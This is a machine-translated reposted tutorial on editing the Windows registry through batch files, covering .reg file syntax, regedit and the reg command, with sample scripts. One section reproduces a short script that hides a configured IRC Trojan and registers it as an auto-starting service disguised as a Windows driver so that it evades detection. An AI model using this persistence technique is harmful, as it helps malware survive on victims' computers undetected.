Shulou(Shulou.com)06/03 Report--

This article will explain in detail how to manipulate the registry in batch processing. The editor thinks it is very practical, so I share it for you as a reference. I hope you can get something after reading this article.

First, batch generate .Reg files to manipulate the registry

.reg files can be easily generated using redirect symbols in batches. Then execute the .reg file with the command!

Here, it is important to understand how .reg files manipulate the registry.

First, the first line of the .reg file must be: Windows Registry Editor Version 5.00. Then it is to operate the contents of the registry.

(consistent with the format of the file exported from the registry)

1, create subkey

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT]

A subkey named "TTT" is created under HKEY_LOCAL_MACHINE\ SOFTWARE\.

2, create a project name

The code is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT]

"Name" = "TTT BLOG"

"EMail" = "taoether@gmail.com"

"URL" = "http://www.taoyoyo.net/ttt/""

"Type" = dword:02

This creates four new projects under [HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT]: Name, EMail, URL and Type.

The type of Name, Email, URL is "String Value"

Type of Type is "DWORD Value"

(attached: windows registry value type:

REG_SZ string value

REG_BINARY binary valu

REG_DWORD DWORD value

REG_MULTI_SZ multi-string value

REG_EXPAND_SZ extensible string value)

3. Modify the key value

Modification is relatively simple, as long as you need to modify the project export, then use notepad to modify, and then import (regedit / s). It's just like a new one. You can modify multiple items under the same subitem at a time.

4, delete the project name

The code is as follows:

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT]

"EMail" =-

Execute the script and "EMail" is deleted

5. Delete subkey

The code is as follows:

Windows Registry Editor Version 5.00

[- HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT]

[- HKEY_LOCAL_MACHINE\ SOFTWARE\ DDD]

By executing the script, the subitems ttt and ddd have been deleted.

6 execution method of .reg file

1) execute the reg file directly

2) regedit / s * .reg (/ s need not be confirmed)

3) reg import * .reg

7. In fact, we can also use dll files instead of reg files.

Batch processing example 1:

The code is as follows:

@ echo off

Echo Windows Registry Editor Version 5.00 > t1.reg

Echo.

Echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ TTT] > > t1.reg

Echo "Name" = "TTT BLOG" > > t1.reg

Echo "EMail" = "taoether@gmail.com" > > t1.reg

Echo "URL" = "http://www.taoyoyo.net/ttt/" > > t1.reg

Echo "Type" = dword:02 > > t1.reg

Regedit / s t1.reg

Del / q t1.reg

Pause

Batch 2: (this example is someone else's. I don't know much about it.)

When we use some older Trojans, we may generate a key under [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run (Runonce, Runservices, Runexec)] in the registry to realize the self-startup of Trojans. However, it is easy to expose the path of the Trojan program, resulting in the Trojan being checked and killed. relatively, it is relatively safe to register the Trojan program as a system service. Take the configured IRC Trojan DSNX as an example (named windrv32.exe)

The code is as follows:

@ start windrv32.exe

@ attrib + h + r windrv32.exe

@ echo [HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Run] > patch.dll

@ echo "windsnx" =-> > patch.dll

@ sc.exe create Windriversrv type= kernel start= auto displayname= WindowsDriver binpath= c:\ winnt\ system32\ windrv32.exe

@ regedit / s patch.dll

@ delete patch.dll

REM [delete the startup key of DSNXDE in the registry, register it as a system critical service with sc.exe and set its properties to hidden and read-only, and config to self-startup]

@ REM, this is not safer ^ _ ^.

Second, the reg command operates the registry

The Reg command is a special tool provided by Windows to manipulate the registry. You can easily query, add, delete, import, export, compare and other operations. You can refer to the help that comes with the system for details.

REG Operation [parameter list]

Operation [QUERY | ADD | DELETE | COPY |

SAVE | LOAD | UNLOAD | RESTORE |

COMPARE | EXPORT | IMPORT]

1, query all subitems and values

D:\ > reg query hklm\ software\ TTT

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\ software\ TTT

Name REG_SZ TTT BLOG

EMail REG_SZ taoether@gmail.com

URL REG_SZ http://www.taoyoyo.net/ttt/

Type REG_DWORD 0x2

2. Query specific items

D:\ > reg query hklm\ software\ ttt / v url

! REG.EXE VERSION 3.0

HKEY_LOCAL_MACHINE\ software\ ttt

Url REG_SZ http://www.taoyoyo.net/ttt/

The hardest thing here is how to get the string we want. I was confused for a long time and finally found a way.

It turns out that there is no other good way, but to use the find,for loop to intercept what we need. (if you don't understand the following example, please refer to another article on this blog: DOS loop-bat/ batch for command. 2)

For example, to get the key value of url: http://www.taoyoyo.net/ttt/, you can use the following script:

The code is as follows:

@ ECHO OFF

For / f "tokens=1,2,3,4,*"% I in ('reg query "HKEY_LOCAL_MACHINE\ software\ ttt" ^ | find / I "URL"') do SET "pURL=%%k"

The URL value of echo TTT BLOG is:% pURL%

Save as Test.bat, and the running result is as follows:

D:\ > test.bat

The URL value of TTT BLOG is: http://www.taoyoyo.net/ttt/

No, I don't know why the computer at home runs the "REG" command (including reg /?) on the command line, CPU takes up 100%, look at the task manager, CMD takes up more than 80%, I don't know why.

There is no problem running other commands, including regedit / s.

Checked, the Internet is said to be the reason for the Trojan horse, but checked, it is not like. No relevant files were found, and there was no problem when running other commands.

Don't do it for a while. I happen to have a REG command on hand. I'll sort it out later!

Because of drug detection, I cleaned disk C with my own Clear.bat, and unexpectedly cleared out a G of space. There were only a few hundred megabytes left. There is so much rubbish in windows. Don't forget to clean it up often!

Then release two finished batch files, you can automatically monitor OutLook Express, if you need it, you can click to download it.

1OEMonitorCount.bat function: you can reset the number of times OE is opened in the registry to avoid prompting compression when more than 100 times

2OEMonitorSize.bat function: it can monitor the size of the Outlook Express mail file (* .dbx) and generate alarm logs when it is larger than the specified size.

These two files can be added to the startup group and run automatically every time you boot!

The main purpose of these two is to solve some problems that often arise in the company:

1) often someone has more than a few G mail files.

2) sometimes and after being compressed according to the prompt, the message may be lost.

I just found that the downloaded file has been suffixed with "htm". Please remove the suffix and use it again!

In addition, when downloading, please use the following links, such as: Qiannao Telecom high-speed download address, Qiannao Netcom high-speed download address. The above VIP link is designed for thousands of brain users.

This is the end of this article on "how to operate the registry in batches". I hope the above content can be of some help to you, so that you can learn more knowledge. if you think the article is good, please share it for more people to see.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.